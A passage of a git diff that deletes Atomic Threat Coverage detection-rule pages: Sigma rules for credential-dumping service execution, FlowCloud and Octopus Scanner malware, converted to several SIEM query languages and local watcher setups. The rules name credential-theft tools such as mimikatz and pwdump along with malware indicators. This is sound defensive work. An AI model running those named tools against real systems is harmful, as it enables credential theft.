-(event_id="1" Image="*\\cmd.exe" CommandLine="*sc config*" CommandLine="*wercplsupporte.dll*")
-(event_id="1" Image="*\\wmic.exe" CommandLine="*COR_PROFILER")
-(event_id="13" TargetObject IN ["*\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\cmd\.exe)(?=.*.*sc config.*)(?=.*.*wercplsupporte\.dll.*))'
-grep -P '^(?:.*(?=.*.*\wmic\.exe)(?=.*.*COR_PROFILER))'
-grep -P '^(?:.*(?=.*13)(?=.*(?:.*.*\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_creddumper.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_creddumper.md
deleted file mode 100644
index 871c40c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_creddumper.md
+++ /dev/null
@@ -1,379 +0,0 @@
-| Title                    | Credential Dumping Tools Service Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects well-known credential dumping tools execution via service execution events |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li><li>[T1035: Service Execution](https://attack.mitre.org/techniques/T1035)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate Administrator using credential dumping tool for password recovery</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>attack.s0005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
----
-action: global
-title: Credential Dumping Tools Service Execution
-description: Detects well-known credential dumping tools execution via service execution events
-author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
-date: 2017/03/05
-modified: 2019/11/01
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.credential_access
-    - attack.execution
-    - attack.t1003
-    - attack.t1035
-    - attack.s0005
-detection:
-    selection_1:
-        - ServiceName|contains:
-            - 'fgexec'
-            - 'wceservice'
-            - 'wce service'
-            - 'pwdump'
-            - 'gsecdump'
-            - 'cachedump'
-            - 'mimikatz'
-            - 'mimidrv'
-        - ImagePath|contains:
-            - 'fgexec'
-            - 'dumpsvc'
-            - 'cachedump'
-            - 'mimidrv'
-            - 'gsecdump'
-            - 'servpw'
-            - 'pwdump'
-        - ImagePath|re: '((\\\\.*\\.*|.*\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\.(exe|scr|cpl|bat|js|cmd|vbs).*)'
-    condition: selection and selection_1
-falsepositives:
-    - Legitimate Administrator using credential dumping tool for password recovery
-level: high
----
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 6
----
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4697
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_mal_creddumper.yml): Backend does not support map values of type <class 'sigma.parser.modifiers.type.SigmaRegularExpressionModifier'>
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\.*\\.*|.*\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"6" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\.*\\.*|.*\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))
-(winlog.channel:"Security" AND winlog.event_id:"4697" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\.*\\.*|.*\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4976aa50-8f41-45c6-8b15-ab3fc10e79ed <<EOF
-{
-  "metadata": {
-    "title": "Credential Dumping Tools Service Execution",
-    "description": "Detects well-known credential dumping tools execution via service execution events",
-    "tags": [
-      "attack.credential_access",
-      "attack.execution",
-      "attack.t1003",
-      "attack.t1035",
-      "attack.s0005"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\\\\\.*\\\\.*|.*\\\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\\\\\.*\\\\.*|.*\\\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Credential Dumping Tools Service Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4976aa50-8f41-45c6-8b15-ab3fc10e79ed-2 <<EOF
-{
-  "metadata": {
-    "title": "Credential Dumping Tools Service Execution",
-    "description": "Detects well-known credential dumping tools execution via service execution events",
-    "tags": [
-      "attack.credential_access",
-      "attack.execution",
-      "attack.t1003",
-      "attack.t1035",
-      "attack.s0005"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\\\\\.*\\\\.*|.*\\\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\\\\\.*\\\\.*|.*\\\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Credential Dumping Tools Service Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4976aa50-8f41-45c6-8b15-ab3fc10e79ed-3 <<EOF
-{
-  "metadata": {
-    "title": "Credential Dumping Tools Service Execution",
-    "description": "Detects well-known credential dumping tools execution via service execution events",
-    "tags": [
-      "attack.credential_access",
-      "attack.execution",
-      "attack.t1003",
-      "attack.t1035",
-      "attack.s0005"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\\\\\.*\\\\.*|.*\\\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND (winlog.event_data.ServiceName.keyword:(*fgexec* OR *wceservice* OR *wce\\ service* OR *pwdump* OR *gsecdump* OR *cachedump* OR *mimikatz* OR *mimidrv*) OR winlog.event_data.ImagePath.keyword:(*fgexec* OR *dumpsvc* OR *cachedump* OR *mimidrv* OR *gsecdump* OR *servpw* OR *pwdump*) OR winlog.event_data.ImagePath:/((\\\\\\\\.*\\\\.*|.*\\\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Credential Dumping Tools Service Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND (ServiceName.keyword:(*fgexec* *wceservice* *wce service* *pwdump* *gsecdump* *cachedump* *mimikatz* *mimidrv*) OR ImagePath.keyword:(*fgexec* *dumpsvc* *cachedump* *mimidrv* *gsecdump* *servpw* *pwdump*) OR ImagePath:/((\\\\.*\\.*|.*\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))
-(EventID:"6" AND (ServiceName.keyword:(*fgexec* *wceservice* *wce service* *pwdump* *gsecdump* *cachedump* *mimikatz* *mimidrv*) OR ImagePath.keyword:(*fgexec* *dumpsvc* *cachedump* *mimidrv* *gsecdump* *servpw* *pwdump*) OR ImagePath:/((\\\\.*\\.*|.*\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))
-(EventID:"4697" AND (ServiceName.keyword:(*fgexec* *wceservice* *wce service* *pwdump* *gsecdump* *cachedump* *mimikatz* *mimidrv*) OR ImagePath.keyword:(*fgexec* *dumpsvc* *cachedump* *mimidrv* *gsecdump* *servpw* *pwdump*) OR ImagePath:/((\\\\.*\\.*|.*\\)([{]?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}[}])?\.(exe|scr|cpl|bat|js|cmd|vbs).*)/))
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_mal_creddumper.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_mal_creddumper.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_mal_creddumper.yml): Node type not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_flowcloud.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_flowcloud.md
deleted file mode 100644
index 722b00e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_flowcloud.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | FlowCloud Malware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects FlowCloud malware from threat group TA410. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1112: Modify Registry](https://attack.mitre.org/techniques/T1112)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1112: Modify Registry](../Triggers/T1112.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new](https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new)</li></ul>  |
-| **Author**               | NVISO |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: FlowCloud Malware
-id: 5118765f-6657-4ddb-a487-d7bd673abbf1
-status: experimental
-description: Detects FlowCloud malware from threat group TA410.
-references:
-  - https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
-author: NVISO
-tags:
-  - attack.persistence
-  - attack.t1112
-date: 2020/06/09
-logsource:
-  product: windows
-  service: sysmon
-detection:
-  selection:
-    EventID:
-      - 12 # key create
-      - 13 # value set
-    TargetObject:
-      - 'HKLM\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'
-      - 'HKLM\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'
-      - 'HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}'
-      - 'HKLM\SYSTEM\Setup\PrintResponsor\\*'
-  condition: selection
-falsepositives:
-  - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "12" -or $_.ID -eq "13") -and ($_.message -match "HKLM\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" -or $_.message -match "HKLM\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" -or $_.message -match "HKLM\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" -or $_.message -match "TargetObject.*HKLM\\SYSTEM\\Setup\\PrintResponsor\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:("12" OR "13") AND winlog.event_data.TargetObject.keyword:(HKLM\\HARDWARE\\\{804423C2\-F490\-4ac3\-BFA5\-13DEDE63A71A\} OR HKLM\\HARDWARE\\\{A5124AF5\-DF23\-49bf\-B0ED\-A18ED3DEA027\} OR HKLM\\HARDWARE\\\{2DB80286\-1784\-48b5\-A751\-B6ED1F490303\} OR HKLM\\SYSTEM\\Setup\\PrintResponsor\\*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/5118765f-6657-4ddb-a487-d7bd673abbf1 <<EOF
-{
-  "metadata": {
-    "title": "FlowCloud Malware",
-    "description": "Detects FlowCloud malware from threat group TA410.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1112"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"12\" OR \"13\") AND winlog.event_data.TargetObject.keyword:(HKLM\\\\HARDWARE\\\\\\{804423C2\\-F490\\-4ac3\\-BFA5\\-13DEDE63A71A\\} OR HKLM\\\\HARDWARE\\\\\\{A5124AF5\\-DF23\\-49bf\\-B0ED\\-A18ED3DEA027\\} OR HKLM\\\\HARDWARE\\\\\\{2DB80286\\-1784\\-48b5\\-A751\\-B6ED1F490303\\} OR HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"12\" OR \"13\") AND winlog.event_data.TargetObject.keyword:(HKLM\\\\HARDWARE\\\\\\{804423C2\\-F490\\-4ac3\\-BFA5\\-13DEDE63A71A\\} OR HKLM\\\\HARDWARE\\\\\\{A5124AF5\\-DF23\\-49bf\\-B0ED\\-A18ED3DEA027\\} OR HKLM\\\\HARDWARE\\\\\\{2DB80286\\-1784\\-48b5\\-A751\\-B6ED1F490303\\} OR HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'FlowCloud Malware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("12" "13") AND TargetObject.keyword:(HKLM\\HARDWARE\\\{804423C2\-F490\-4ac3\-BFA5\-13DEDE63A71A\} HKLM\\HARDWARE\\\{A5124AF5\-DF23\-49bf\-B0ED\-A18ED3DEA027\} HKLM\\HARDWARE\\\{2DB80286\-1784\-48b5\-A751\-B6ED1F490303\} HKLM\\SYSTEM\\Setup\\PrintResponsor\\*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="12" OR EventCode="13") (TargetObject="HKLM\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" OR TargetObject="HKLM\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" OR TargetObject="HKLM\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" OR TargetObject="HKLM\\SYSTEM\\Setup\\PrintResponsor\\*"))
-```
-
-
-### logpoint
-    
-```
-(event_id IN ["12", "13"] TargetObject IN ["HKLM\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}", "HKLM\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}", "HKLM\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}", "HKLM\\SYSTEM\\Setup\\PrintResponsor\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*12|.*13))(?=.*(?:.*HKLM\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A\}|.*HKLM\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027\}|.*HKLM\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303\}|.*HKLM\SYSTEM\Setup\PrintResponsor\\.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_octopus_scanner.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_octopus_scanner.md
deleted file mode 100644
index 2b3ac1d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_octopus_scanner.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Octopus Scanner Malware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Octopus Scanner Malware. |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** | <ul><li>[T1195: Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain](https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain)</li></ul>  |
-| **Author**               | NVISO |
-| Other Tags           | <ul><li>attack.t1195.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Octopus Scanner Malware
-id: 805c55d9-31e6-4846-9878-c34c75054fe9
-status: experimental
-description: Detects Octopus Scanner Malware.
-references:
-  - https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
-tags:
-  - attack.t1195
-  - attack.t1195.001
-author: NVISO
-date: 2020/06/09
-logsource:
-  product: windows
-  service: sysmon
-detection:
-  filecreate:
-    EventID: 11
-  selection:
-    TargetFilename|endswith:
-      - '\AppData\Local\Microsoft\Cache134.dat'
-      - '\AppData\Local\Microsoft\ExplorerSync.db'
-  condition: filecreate and selection
-falsepositives:
-  - Unknown
-level: high
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "11" -and ($_.message -match "TargetFilename.*.*\\AppData\\Local\\Microsoft\\Cache134.dat" -or $_.message -match "TargetFilename.*.*\\AppData\\Local\\Microsoft\\ExplorerSync.db")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"11" AND winlog.event_data.TargetFilename.keyword:(*\\AppData\\Local\\Microsoft\\Cache134.dat OR *\\AppData\\Local\\Microsoft\\ExplorerSync.db))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/805c55d9-31e6-4846-9878-c34c75054fe9 <<EOF
-{
-  "metadata": {
-    "title": "Octopus Scanner Malware",
-    "description": "Detects Octopus Scanner Malware.",
-    "tags": [
-      "attack.t1195",
-      "attack.t1195.001"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:(*\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat OR *\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:(*\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat OR *\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
